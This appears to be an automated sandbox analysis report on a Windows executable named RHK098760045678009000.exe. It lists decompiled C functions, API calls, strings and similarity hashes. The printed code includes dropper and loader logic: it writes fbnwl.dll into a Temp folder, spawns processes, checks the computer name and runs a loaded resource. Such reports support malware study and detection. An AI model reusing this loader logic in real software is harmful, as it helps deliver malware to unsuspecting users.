                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %p %p %p 0x%08x
                • API String ID: 0-2106592379
                • Opcode ID: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction ID: 9ff21b7f37d80de3f6f4944a60e43cc42327b114859789f042502f158bb5db72
                • Opcode Fuzzy Hash: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction Fuzzy Hash: E4710AB5904208EFDF04CF94D980BDEB7B5BF48314F208659E925AB384D775BA80CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                0x0040205c
                0x00402066
                0x0040206f
                0x00402079
                0x00402082
                0x0040208c
                0x00402090
                0x00402090
                0x00402095
                0x004020a6
                0x004020ae
                0x0040218e
                0x0040218e
                0x00402195
                0x004020b4
                0x004020b4
                0x004020c5
                0x004020c9
                0x004020cf
                0x004020d9
                0x004020db
                0x004020e6
                0x004020e9
                0x004020f6
                0x004020f8
                0x004020fa
                0x00402101
                0x00402104
                0x00402104
                0x00402107
                0x00402111
                0x00402119
                0x0040211e
                0x0040212a
                0x0040212a
                0x0040212d
                0x00402136
                0x00402139
                0x00402142
                0x00402147
                0x00402159
                0x00402168
                0x0040216a
                0x00402176
                0x00402176
                0x00402168
                0x00402178
                0x0040217e
                0x0040217e
                0x00402181
                0x00402187
                0x0040218c
                0x004021a1
                0x00000000
                0x00000000
                0x00000000
                0x0040218c
                0x00402197
                0x004028c1
                0x004028cd

                APIs
                • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                Strings
                • C:\Users\user~1\AppData\Local\Temp, xrefs: 004020DE
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user~1\AppData\Local\Temp
                • API String ID: 123533781-3107243751
                • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E6FF82560(intOrPtr _a4, intOrPtr _a8, char* _a12, int* _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				short _v2068;
				short* _t32;
				intOrPtr _t33;
				int _t44;
				void* _t58;
				void* _t61;

				_v8 = 0;
				_t32 =  &_v2068;
				0x6ff80000(_t32);
				_v20 = _t32;
				_t33 = _a8;
				0x6ff80000(_a4, _t33, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t33);
				_t61 = _t58 + 0x1c;
				if(_a12 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					if(_a4 == 0) {
						L6:
						_v16 = E6FF82440(_v8, _a8,  &_v2068,  &_v20);
						if(_v16 == 0) {
							_v12 = WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, 0, 0, 0, 0);
							if( *_a16 >= _v12) {
								WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, _a12, _v12, 0, 0);
							} else {
								_v16 = 0x800007d2;
							}
							 *_a16 = _v12;
						}
						0x6ff80000(_v8);
						return _v16;
					}
					_t44 = E6FF82B80(_a4);
					_t61 = _t61 + 4;
					_v8 = _t44;
					if(_v8 != 0) {
						goto L6;
					}
					return 0xc0000bbb;
				}
			}













                0x6ff82569
                0x6ff82570
                0x6ff82577
                0x6ff8257f
                0x6ff8258a
                0x6ff82592
                0x6ff825a0
                0x6ff825a5
                0x6ff825ac
                0x00000000
                0x6ff825be
                0x6ff825c2
                0x6ff825e3
                0x6ff825fb
                0x6ff82602
                0x6ff8261f
                0x6ff8262a
                0x6ff8264e
                0x6ff8262c
                0x6ff8262c
                0x6ff8262c
                0x6ff8265a
                0x6ff8265a
                0x6ff82660
                0x00000000
                0x6ff82668
                0x6ff825c8
                0x6ff825cd
                0x6ff825d0
                0x6ff825d7
                0x00000000
                0x00000000
                0x00000000
                0x6ff825d9

                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF82619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF8264E
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide
                • String ID: %s %d %p %p
                • API String ID: 626452242-2135802371
                • Opcode ID: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction ID: 933faf7f063966fcdbdc59592c8d1b00372ffe5c736e11dc471f9cf96b6655b6
                • Opcode Fuzzy Hash: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction Fuzzy Hash: B0313AB5904208ABDF10DF94CD40FAE77B8BF08714F108559B924AB2C4D7B5AA51CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                0x00404de0
                0x00404e05
                0x00404e25
                0x00404e28
                0x00404e2b
                0x00404e42
                0x00404e48
                0x00404e4f
                0x00404e56
                0x00404e5d
                0x00404e62
                0x00404e68
                0x00000000
                0x00404e78
                0x00404e12
                0x00404e65
                0x00404e65
                0x00000000
                0x00404e65
                0x00404e1e
                0x00404e20
                0x00000000
                0x00404e20
                0x00404de6
                0x00000000
                0x00000000
                0x00404ded
                0x00000000

                APIs
                • IsWindowVisible.USER32 ref: 00404E0A
                • CallWindowProcA.USER32 ref: 00404E78
                  • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E6FF82CE0(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				short _v44;
				long _t13;
				intOrPtr _t17;

				_t13 =  &_v44;
				0x6ff80000(_t13);
				_v8 = _t13;
				if(GetComputerNameW( &_v44,  &_v8) != 0) {
					if(_a8 != _v8) {
						L5:
						_v12 = 0;
						L6:
						return _v12;
					}
					_t17 = _a4;
					__imp___wcsnicmp(_t17,  &_v44, _v8);
					if(_t17 != 0) {
						goto L5;
					}
					_v12 = 1;
					goto L6;
				}
				return 0;
			}








                0x6ff82ce6
                0x6ff82cea
                0x6ff82cf2
                0x6ff82d05
                0x6ff82d11
                0x6ff82d35
                0x6ff82d35
                0x6ff82d3c
                0x00000000
                0x6ff82d3c
                0x6ff82d1b
                0x6ff82d1f
                0x6ff82d2a
                0x00000000
                0x00000000
                0x6ff82d2c
                0x00000000
                0x6ff82d2c
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ComputerName_wcsnicmp
                • String ID: P~u
                • API String ID: 657830731-3400813311
                • Opcode ID: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction ID: 4bbd63994f885e24792fda9b50c5bdf1e5b715894faeef8b914172634ccad60d
                • Opcode Fuzzy Hash: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction Fuzzy Hash: B8F03CB2904208EBCB00DFA4C988ACEBBB8AF08314F504954E916AB204F731F6958B71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\FRONTD~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                0x004024f1
                0x004024f1
                0x004024f4
                0x0040250f
                0x004024f6
                0x004024f8
                0x004024fd
                0x00402504
                0x00402516
                0x0040268f
                0x0040268f
                0x0040251c
                0x0040252e
                0x004015a6
                0x004015a8
                0x00000000
                0x004015ae
                0x004015a8
                0x004028c1
                0x004028cd

                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll, xrefs: 004024FD, 00402522
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll
                • API String ID: 427699356-3397501634
                • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x00405401
                0x0040541d
                0x00405425
                0x0040542a
                0x00000000
                0x00405430
                0x00405434

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                • CloseHandle.KERNEL32(?), ref: 0040542A
                Strings
                • Error launching installer, xrefs: 0040540B
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                0x00403557
                0x0040355f
                0x00403566
                0x00403569
                0x00403569
                0x0040356b
                0x00403570
                0x00403577
                0x0040357d
                0x00403581
                0x00403582
                0x0040358a

                APIs
                • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                • GlobalFree.KERNEL32 ref: 00403577
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403568
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 1100898210-2382934351
                • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x004056d3
                0x004056dd
                0x004056df
                0x004056e6
                0x004056ee
                0x00000000
                0x00000000
                0x00000000
                0x004056ee
                0x004056f0
                0x004056f5

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 004056D8
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 004056E6
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3976562730
                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                0x004057f0
                0x004057f2
                0x0040581a
                0x004057ff
                0x00405804
                0x0040580f
                0x00000000
                0x0040582c
                0x00405818
                0x00405818
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: RHK098760045678009000.exe PID: 2184 Parent PID: 5820 RHK098760045678009000.exeCOMMON

                Executed Functions

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
